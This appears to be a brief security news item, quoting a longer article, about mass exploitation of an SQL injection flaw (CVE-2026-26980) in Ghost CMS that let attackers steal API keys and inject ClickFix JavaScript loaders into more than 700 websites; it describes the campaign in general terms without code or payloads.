Ghost CMS Vulnerability Exploited to Hack Over 700 Websites

Ghost CMS Vulnerability Exploited to Hack Over 700 Websites

Briefly

"The exploited vulnerability is tracked as CVE-2026-26980 and its existence came to light in February when it was patched. Ghost is a widely used open source CMS designed specifically for blogging, newsletters, and publishing, offering built-in tools for memberships, subscriptions, and audience monetization. According to its developer, Ghost is actively used by over 100,000 websites."

"When CVE-2026-26980 was disclosed, SentinelOne warned that the vulnerability, an SQL injection flaw, can be exploited by unauthenticated attackers to extract sensitive data from the Ghost database. The security firm noted that an attacker could obtain authentication tokens, user credentials, and website content."

"Qianxin reported last week that CVE-2026-26980 has been exploited in mass attacks against unpatched Ghost instances. Threat actors leveraged the flaw to obtain the targeted sites' Admin API Key and then used the API to alter articles posted on Ghost-powered sites. Specifically, the attackers injected malicious JavaScript loaders designed for ClickFix attacks."

"Qianxin started seeing compromised websites in early May. The security firm has identified more than 700 websites compromised in the campaign, including ones belonging to major organizations such as DuckDuckGo, Harvard University, and Oxford University. An analysis showed that nearly half of the hacked websites are personal blogs and independent sites, but dozens belong to software development and tech blogs, AI, cryptocurrency, and various other types of entities."